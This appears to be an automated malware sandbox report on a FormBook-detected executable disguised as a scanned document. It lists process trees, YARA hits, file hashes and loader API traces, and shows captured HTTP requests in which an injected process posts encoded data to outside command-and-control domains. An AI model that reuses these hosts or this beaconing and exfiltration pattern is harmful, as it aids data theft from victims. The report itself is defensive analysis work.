O2ePNNH0=5jf2zjfdd87cWpjfUFlE8WYbtOHLr/45+0Lp9kmVcrDnziOftYdrgCY9Vke6Z1VBFQLPBP9DS5ZkO14vIspTVhg60BO5pW39ANdQhAwgu/UWqohye+7D4xRFP/QyC57EfekO1hXww7cVR9lCXFRLn8kmZ0+5qvzXuTeN5ua8vYovYo3YDIsxL1Yoi0Xrlp8v9sui6CKMnt/t8uvvzmKDLQaYDFY7egi0XE3QLgN5+5Kyi0YuBE9pjG9cLUGi5NYb9OLbQ2XMOo2ePW0/FnQfQEmoUy2CL3H8jVzcdpUefLJPZL/KXK+nr2P+hYfCtVN9iS7DC0zouLltoZYqKg+j1VHCAFx09SjwwTBg7PyV5qlVfTMptoLLwWv0xuluAB2BdPA8hI6HZi8oBtMmQ70AYdE3ENoWQeepIupr7aI0/mw+2Su7FcFKTsFv6q+jAXtErPWY3/PdGrSOY4yS1qzfVXn9lebi2P34SIbLBDwW3gHMGT5ZAfI599dA/DFQXvowbVOsRb0eKs4Km0g0d4JfBUV5sm8iZJ9qLcF64Axddr8EnXvyK3sbvb3fyiAcAAxBhZFdNXNO7nr+UKZqF/2Rcf7pShe5NkBWZOX+fedtyeHquHXApQBuvm3IaVx6Q5dC0puwo2FtEseYbYrZHQHX1t7DBU6wnLDio9DuNKsFnoi7umzF18pETTaQxlk0gPKLVXqkouNRvSQMNytVuZTFEtv74DfjcoDwPgdKgI8tN0Zs1S+cDgQmii4LnFUNDOZWTBtPuvJ7PdYUrerSPrn/sBI8yWLHIscPjBgJO34q/cN2hfiJk8fmfnj/keE9kgeuYgTgwumscGllhteDXgE9bRyoVghCDD7KWkY0sfWXi/EfbO8BeTB8asHZ6c6xhNqLGTEo7a+8Fkmi9luXtQRM2ZeLkL4qN95wkuSx4Br4xw7+h21wKkj1YnouAdVKQhLNoU19TTuUQOSK4RPPQlr6XK7doLMIp1EzQ4QMF6D2r4p [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.8	60454	68.65.122.71	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:05:46.123549938 CET	478	OUT	GET /csd1/?O2ePNNH0=0h3WwWevRNaqBPz4X21Ll2QLu9yBncRH4GvN+jOYSYvv/wPW0ZZUjDEdN12hCkheLADdXdQ+boBHPC0vEe57Vgc9vjW+03TEJsYMyVopgf5EyZ5UePzu/SZcWe82Of3NdA==&56-H=2t2xuzpX2 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.rtp189z.lat Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Jan 6, 2025 16:05:48.793119907 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Mon, 06 Jan 2025 15:05:48 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
Jan 6, 2025 16:05:48.793138027 CET	316	IN	Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.8	60455	103.174.136.137	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:06:12.176666975 CET	754	OUT	POST /8m3y/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.u75lmwdgp0du.homes Origin: http://www.u75lmwdgp0du.homes Referer: http://www.u75lmwdgp0du.homes/8m3y/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 209 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 7a 5a 56 44 71 67 42 7a 4f 33 51 58 55 45 45 69 71 77 55 67 4e 59 32 46 5a 79 43 4d 70 68 62 42 4d 63 46 34 6f 5a 76 6f 6a 71 6c 59 69 73 4d 37 75 48 56 43 51 67 72 45 43 45 42 58 52 64 37 44 4f 53 32 2f 48 6d 45 30 7a 4b 47 58 31 61 36 78 72 45 43 68 4d 33 58 62 4a 79 72 37 52 38 6b 47 78 76 49 43 44 67 78 36 42 59 73 71 57 6b 6d 4f 6f 69 54 57 78 2b 4d 64 70 47 2f 42 57 6a 74 63 38 63 4c 4c 47 2b 45 31 47 4a 64 39 62 51 76 44 5a 47 77 42 4c 6e 68 7a 78 6a 59 73 70 59 6d 31 6f 6f 4d 43 6f 79 42 4a 61 79 44 65 79 48 66 31 45 32 6e 53 38 71 42 76 67 6f 34 35 63 68 31 38 70 37 38 62 73 30 38 3d Data Ascii: O2ePNNH0=zZVDqgBzO3QXUEEiqwUgNY2FZyCMphbBMcF4oZvojqlYisM7uHVCQgrECEBXRd7DOS2/HmE0zKGX1a6xrEChM3XbJyr7R8kGxvICDgx6BYsqWkmOoiTWx+MdpG/BWjtc8cLLG+E1GJd9bQvDZGwBLnhzxjYspYm1ooMCoyBJayDeyHf1E2nS8qBvgo45ch18p78bs08=

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.8	60456	103.174.136.137	80

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:06:16.240333080 CET	774	OUT	POST /8m3y/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.u75lmwdgp0du.homes Origin: http://www.u75lmwdgp0du.homes Referer: http://www.u75lmwdgp0du.homes/8m3y/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 229 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 7a 5a 56 44 71 67 42 7a 4f 33 51 58 47 30 30 69 6f 54 73 67 4b 34 32 47 48 43 43 4d 77 78 62 4e 4d 63 42 34 6f 59 72 34 6a 59 42 59 68 4f 6b 37 76 46 78 43 52 67 72 45 52 45 42 53 56 64 37 49 4f 53 36 33 48 69 59 30 7a 4b 53 58 31 65 32 78 72 33 36 69 65 58 58 5a 58 53 72 39 66 63 6b 47 78 76 49 43 44 67 4e 63 42 59 55 71 57 31 57 4f 71 44 54 52 39 65 4d 63 35 32 2f 42 53 6a 74 59 38 63 4c 70 47 36 64 61 47 50 52 39 62 56 54 44 5a 55 49 41 43 6e 68 78 76 54 5a 36 76 4c 66 39 6e 37 45 6a 6c 6b 42 62 55 44 76 54 2b 52 75 66 65 55 76 55 2f 71 70 45 67 72 51 50 5a 57 6f 55 7a 59 73 72 79 6a 70 49 69 67 53 75 34 2b 31 42 75 79 6f 53 39 44 68 43 38 77 6c 58 Data Ascii: O2ePNNH0=zZVDqgBzO3QXG00ioTsgK42GHCCMwxbNMcB4oYr4jYBYhOk7vFxCRgrEREBSVd7IOS63HiY0zKSX1e2xr36ieXXZXSr9fckGxvICDgNcBYUqW1WOqDTR9eMc52/BSjtY8cLpG6daGPR9bVTDZUIACnhxvTZ6vLf9n7EjlkBbUDvT+RufeUvU/qpEgrQPZWoUzYsryjpIigSu4+1BuyoS9DhC8wlX

Target ID:	0
Start time:	10:02:05
Start date:	06/01/2025
Path:	C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe"
Imagebase:	0x810000
File size:	1'602'560 bytes
MD5 hash:	FA2EAD992BA2AC05214B3F586A3257BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:02:06
Start date:	06/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe"
Imagebase:	0x920000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1635374918.00000000036D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1634925117.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1635925426.0000000004800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:02:16
Start date:	06/01/2025
Path:	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe"
Imagebase:	0xf70000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3921258002.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	10:02:17
Start date:	06/01/2025
Path:	C:\Windows\SysWOW64\w32tm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\w32tm.exe"
Imagebase:	0xbe0000
File size:	92'672 bytes
MD5 hash:	E55B6A057FDDD35A7380FB2C6811A8EC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3921287950.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3910307561.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3921356109.0000000003370000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	10:02:31
Start date:	06/01/2025
Path:	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe"
Imagebase:	0xf70000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3923632422.00000000051D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	10:02:44
Start date:	06/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6d20e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	1%
Signature Coverage:	2.9%
Total number of Nodes:	1720
Total number of Limit Nodes:	47

Executed Functions

Function 008142DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0081430D

Part of subcall function 00816B57: _wcslen.LIBCMT ref: 00816B6A

GetCurrentProcess.KERNEL32(?,008ACB64,00000000,?,?), ref: 00814422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00814429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00814454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00814466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00814474
FreeLibrary.KERNEL32(00000000,?,?), ref: 0081447B
GetSystemInfo.KERNEL32(?,?,?), ref: 008144A0

Strings

|O, xrefs: 008536F8
GetNativeSystemInfo, xrefs: 00814460
kernel32.dll, xrefs: 0081444F

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 9faee72a2a55bbe90d7303b3da3e735a3651f48f8e7c83d054a1454f8bb3573a
Instruction ID: 83609f7703a0f45fb60c0adcb8e95cb608e57befc78751362fbb09c8a3d61a69
Opcode Fuzzy Hash: 9faee72a2a55bbe90d7303b3da3e735a3651f48f8e7c83d054a1454f8bb3573a
Instruction Fuzzy Hash: EEA1C37290A2C4EFCF11C7697CC85DA7FE8FB26745B0858A9D481DBB22D6384948CB35

Function 008142A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,008150AA,?,?,00000000,00000000), ref: 008142B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008150AA,?,?,00000000,00000000), ref: 008142C9
LoadResource.KERNEL32(?,00000000,?,?,008150AA,?,?,00000000,00000000,?,?,?,?,?,?,00814F20), ref: 008535BE
SizeofResource.KERNEL32(?,00000000,?,?,008150AA,?,?,00000000,00000000,?,?,?,?,?,?,00814F20), ref: 008535D3
LockResource.KERNEL32(008150AA,?,?,008150AA,?,?,00000000,00000000,?,?,?,?,?,?,00814F20,?), ref: 008535E6

Strings

SCRIPT, xrefs: 008142BF

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 4420bf8b017cd4477b433d04a7f6e9f39d6b510a0ed5a9b8fa21bfcde4889206
Instruction ID: 69d716e3ada662d585f3211412857fb945031fe3a45963813708d1a083984510
Opcode Fuzzy Hash: 4420bf8b017cd4477b433d04a7f6e9f39d6b510a0ed5a9b8fa21bfcde4889206
Instruction Fuzzy Hash: FD117C70200701BFE7218B65DC48F677BBEFFC6B51F104169B412D6650DBB2D8408620

Function 00852BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00812B6B

Part of subcall function 00813A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008E1418,?,00812E7F,?,?,?,00000000), ref: 00813A78

Part of subcall function 00819CB3: _wcslen.LIBCMT ref: 00819CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,008D2224), ref: 00852C10
ShellExecuteW.SHELL32(00000000,?,?,008D2224), ref: 00852C17

Strings

runas, xrefs: 00852C0B

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: e861e84467906d6d7bc81a8e40b06679a298dcd10681e64e1bb47baf4dc82481
Instruction ID: 66f61813ab1327c40b520d8b595b8889a53824e410f03777f951900cf97477be
Opcode Fuzzy Hash: e861e84467906d6d7bc81a8e40b06679a298dcd10681e64e1bb47baf4dc82481
Instruction Fuzzy Hash: 0A11D531108345AACB04FF68E8559EEB7ADFF96310F44042EF192C22A2CF318AC98753

Function 0081D730 Relevance: 21.6, APIs: 14, Instructions: 623windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 0081D807
timeGetTime.WINMM ref: 0081DA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0081DB28
TranslateMessage.USER32(?), ref: 0081DB7B
DispatchMessageW.USER32(?), ref: 0081DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0081DB9F
Sleep.KERNEL32(0000000A), ref: 0081DBB1

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 4c11f2a9eeebbea1a8de3e9aa2c786faf101d258409ab9a1a7cdde2e61ec60d9
Instruction ID: d87a02332ad2e66c82f2d7ae1ea759e4c9b6a081758c75e86d1e8f0a20b231cd
Opcode Fuzzy Hash: 4c11f2a9eeebbea1a8de3e9aa2c786faf101d258409ab9a1a7cdde2e61ec60d9
Instruction Fuzzy Hash: 66421430608745DFDB29CF28C884BAABBE8FF46314F15456DE456CB291D774E884CB92

Function 00812CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00812D07
RegisterClassExW.USER32(00000030), ref: 00812D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00812D42
InitCommonControlsEx.COMCTL32(?), ref: 00812D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00812D6F
LoadIconW.USER32(000000A9), ref: 00812D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00812D94

Strings

+, xrefs: 00812CF0
AutoIt v3 GUI, xrefs: 00812D23
0, xrefs: 00812CE9
TaskbarCreated, xrefs: 00812D37

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 682686a0f6687b36f11884cf974afd1c46cd5898393dfc308a56ce5c5cbced41
Instruction ID: 628822a5554d6cb8edb4362ea3450451fe2105f5ac1dc94147edf4f15b93f7f0
Opcode Fuzzy Hash: 682686a0f6687b36f11884cf974afd1c46cd5898393dfc308a56ce5c5cbced41
Instruction Fuzzy Hash: 9F21C3B5901258AFEF00EFA8E889BDDBFB4FB09700F00811AF611AA6A0D7B55544CF91

Function 0085065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0085039A: CreateFileW.KERNELBASE(00000000,00000000,?,00850704,?,?,00000000,?,00850704,00000000,0000000C), ref: 008503B7

GetLastError.KERNEL32 ref: 0085076F
__dosmaperr.LIBCMT ref: 00850776
GetFileType.KERNELBASE(00000000), ref: 00850782
GetLastError.KERNEL32 ref: 0085078C
__dosmaperr.LIBCMT ref: 00850795
CloseHandle.KERNEL32(00000000), ref: 008507B5
CloseHandle.KERNEL32(?), ref: 008508FF
GetLastError.KERNEL32 ref: 00850931
__dosmaperr.LIBCMT ref: 00850938

Strings

H, xrefs: 008508BD

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 3b8ccc0a1b299a2f75b48142b519e28bd13b8578578e8cfc0dc729c3b3d19f08
Instruction ID: 47fc44fd7cfb72e10186c9529a0974024ee4aa2580bce8a5832cd7e1a42ffff3
Opcode Fuzzy Hash: 3b8ccc0a1b299a2f75b48142b519e28bd13b8578578e8cfc0dc729c3b3d19f08
Instruction Fuzzy Hash: E0A10332A001488FDF19AF68D891BAE7BA0FB46325F140159FC11DF392DA71981ACF92

Function 0081344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00813A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008E1418,?,00812E7F,?,?,?,00000000), ref: 00813A78

Part of subcall function 00813357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00813379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0081356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0085318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 008531CE
RegCloseKey.ADVAPI32(?), ref: 00853210
_wcslen.LIBCMT ref: 00853277
_wcslen.LIBCMT ref: 00853286

Strings

\, xrefs: 0085328C
Include, xrefs: 00853184, 008531C5
Software\AutoIt v3\AutoIt, xrefs: 00813560
\Include\, xrefs: 00813527

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
